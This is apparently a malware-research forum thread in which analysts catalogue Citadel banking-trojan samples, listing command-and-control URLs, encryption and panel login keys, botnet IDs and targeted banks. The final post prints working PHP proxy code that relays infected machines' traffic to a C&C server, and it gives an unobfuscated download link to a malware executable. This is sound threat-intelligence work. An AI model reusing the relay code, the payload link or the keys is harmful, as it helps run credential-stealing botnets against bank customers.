Citadel (Zeus clone)

Forum for analysis and discussion about malware.
Post Reply
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Fri Jul 12, 2013 11:53 am

Version 1.3.5.1 targeting wellsfargo.com

Code: Select all

Drop: hxtp://173.192.210.79/KEAGAN/BBA/gate.php
Update: hxtp://173.192.210.79/KEAGAN/BBA/file.php|file=soft.exe
Key: B5 45 6D 50 7D 87 0E 24 F7 55 60 7C 47 4C 15 E5
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
C&C

Code: Select all

hxtp://173.192.210.79/KEAGAN/BBA/install/
hxtp://173.192.210.79/KEAGAN/BBA/my.php?m=login
hxtp://173.192.210.79/KEAGAN/BBA/_lk3/files/CIT/
exe, plugin, config and decoded in attach
https://www.virustotal.com/en/file/0f3c ... 373629965/

Solving the last interesting old sample in this thread, rest are .zip without config.
Xylitol wrote:Fun

Code: Select all

00420CD8  |.  68 C0194000   PUSH 4019C0                              ; |Text = "Coded by BRIAN KREBS for personal use only. I love my job & wife."
two more C&C

Code: Select all

hxxp://inbani.com/js/res/cp.php?m=login
hxxp://inbani.com/js/res/theme/images/citadel.jpg
--
hxxp://lotosmusicfm.net/jstat/cp.php
hxxp://lotosmusicfm.net/jstat/theme/images/citadel.jpg
https://www.virustotal.com/file/6f6b5fe ... 338035569/
Citadel v1.3.4.0 targeting a lot of banks (chase, bank of america, capital one, pnc, american express...) and some germans banks.

Code: Select all

Drop: hxtp://metaxserv93.in/webstat79/info.php
Update: hxtp://metaxserv15.in/webstat79/file.php|file=volumeup.exe
Key: 62 86 90 BE 08 CB B0 C4 B5 25 0B 39 4D 82 65 02
Login key: 79B194D261FBD4BE3591802621C7E08E
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Thu Jul 25, 2013 2:03 pm

Citadel 1.3.5.1 targeting french banks

Code: Select all

Drop: hxtp://madlion.sc/lion/file.php
Config: hxtp://madlion.sc/lion/file.php|file=cobra.exe
Panel: hxtp://madlion.sc/lion/control.php?m=login
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
I've lost the config file but the decoded version is in attach.
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Sat Aug 10, 2013 6:03 pm

Seem citadel 1.3.5.1 can't grab anymore datas on firefox 23.0
Evilcry
Posts: 135
Joined: Tue Apr 20, 2010 6:10 pm

Sun Aug 11, 2013 6:43 am

Yes it seems there are problems into injection / PR_* hooking.
wacked2
Posts: 19
Joined: Sat Dec 17, 2011 3:25 pm

Sun Aug 11, 2013 5:52 pm

It's an easy fix.
The interesting functions have simply been moved from nspr4 to ss3
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Mon Aug 12, 2013 2:32 pm

1.3.5.1 targeting CA/UK/DE/USA..

Code: Select all

Drop: hxtp://sellherro.ru/milk/file.php
Panel: hxtp://sellherro.ru/milk/xyz.php?m=login
Key: 73 D8 8F 18 73 71 52 88 38 D1 E5 E1 85 1C 44 6E
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
https://www.virustotal.com/en/file/be0f ... 376317996/
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Tue Aug 27, 2013 1:24 pm

1.3.5.1 > https://www.virustotal.com/en/file/8b63 ... 377609564/

Code: Select all

Drop: hxtp://legitvendors.ru/wordpress.php
Config: hxtp://legitvendors.ru/file.php|file=svchosts.exe
Panel: hxtp://legitvendors.ru/visco.php?m=login
Key: 00 5D D0 64 F2 49 51 B0 42 D9 FC 49 C6 EC 38 2E
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Tue Aug 27, 2013 8:33 pm

Citadel 1.3.5.1

Code: Select all

Botnet ID: armani (alfabeta, axlogax, brand_new, haha, LLLLL, logmein, menu, menu2, omega, POS, text_corn, u, update, we_we_we, xyl)
Config: hxtp://symbian-theme.biz/armani/gallery.php|file=ssl_cert.exe
Drop: hxtp://real-life2013.in.ua/armani/buy.php
Key: 4F B8 51 53 B1 02 62 EC F5 02 8F 67 AD 1F 9B 00
Login key: 20038735198F82BC8495A2C1B01A9210

Code: Select all

Botnet ID: carfca (rf)
Config: hxtp://real-newslife.com/carfca/football.php|file=carfca.exe
Drop: hxtp://real-life-tips.com/carfca/basket.php
Key: 94 D3 A2 79 A4 12 23 5D 03 60 52 54 84 06 7C F1
Login key: 20038735198F82BC8495A2C1B01A9210

Code: Select all

Botnet ID: coconut
Config: hxtp://yahoo.com/coconut/footer.php|file=pop.exe
Drop: hxtp://agryasona.org/coconut/header.php
Key: D8 3F 6D 1E AA B2 4E C3 88 83 D1 CC 68 C5 F4 9A
Login key: 20038735198F82BC8495A2C1B01A9210

Code: Select all

Botnet ID: just (justme)
Config: hxtp://evenbegosurous.com/just/norton.php|file=pop.exe
Drop: hxtp://dolimdwe.com/just/ping.php
Key: B1 43 D3 D2 08 CF 08 B4 83 5B 37 C2 7B AF 8F CD
Login key: 20038735198F82BC8495A2C1B01A9210

Code: Select all

Botnet ID: pmserver
Config: hxtp://aquabox.in.ua/pmserver/browse.php|file=pmserver.exe
Drop: hxtp://printing-offices.com/pmserver/get.php
Key: 0F BD ED 17 8A 0F 7C 7D 37 1E 0C 3F 88 26 C3 09
Login key: 20038735198F82BC8495A2C1B01A9210

Code: Select all

Botnet ID: supernew (xxaaxxaaxx, canadas)
Config: hxtp://188.190.100.37/supernew/download.php|file=pop.exe
Drop: hxtp://real-life2013.in.ua/supernew/upload.php
Key: D8 3F 6D 1E AA B2 4E C3 88 83 D1 CC 68 C5 F4 9A
Login key: 20038735198F82BC8495A2C1B01A9210

Code: Select all

Botnet ID: uae (test)
Config: hxtp://geographic-channel.com/uae/viewlogo.php|file=doggy.exe
Drop: hxtp://aquabox.in.ua/uae/ping.php
Key: 92 B0 0C 09 C2 30 1F B4 65 FD 68 8D E1 79 C2 E9
Login key: 20038735198F82BC8495A2C1B01A9210
Image
'POS' indeed, several of these Citadel botnets was pushing Dexter and Alina.
No EXE files, just decoded configs in attach (took the keys from the panels...)
It was on the same server as my story here about Dexter: http://www.xylibox.com/2013/08/point-of ... exter.html

To give you an idea of the botnets:
Image Image Image
Image Image
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Sun Sep 01, 2013 2:16 pm

1.3.5.1 almost no triggers:
*wellsfargo.com/*
*facebook.com/*
@*payment.com/*

Code: Select all

Drop: hxtp://www.faw.cl/images/fotos/web/citadelka/gate.php
Update: hxtp://www.faw.cl/images/fotos/web/citadelka/file.php|file=soft.exe
Key: 62 F0 67 D6 3B BC 2D 0F D0 EB 5F 63 2F F4 A4 A4
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Mon Sep 02, 2013 10:53 am

1.3.5.1

Code: Select all

Drop: hxtp://smic.hitc.edu.vn/modules/mod_xsystemx/redir.php
Config: hxtp://darklab.ru/conf/file.php|file=cfg.c
Key: A4 6D 4D 1E 22 49 A4 FE AC A9 E6 55 99 27 E0 0D
login key: C1F20D2340B519056A7D89B7DF4B0FFF
redir.php:

Code: Select all

<?php
//URL îðèãèíàëüíîãî ñåðâåðà.
$url = "http://gorktser.ru/srv/gate.php";

@error_reporting(0); @set_time_limit(0);

//Êîííåêòèìñÿ ê îðèãèíàëüíîìó ñåðâåðó.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80; 
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

//Ïîëó÷àåì äàííûå äëÿ ïåðåñûëêè.
if(($data = @file_get_contents('php://input')) === false)$data = '';

//Ôîðìèðóåì çàïðîñ.
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

//Îòïðàâëÿåì.
fwrite($real_server, $request."\r\n".$data);

//Ïîëó÷àåì îòâåò.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

//Âûâîäèì îòâåò.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
Image
Sample is also here:

Code: Select all

http://gorktser.ru/srv/files/loft_crptd(1).exe
(same hash)
You do not have the required permissions to view the files attached to this post.
Post Reply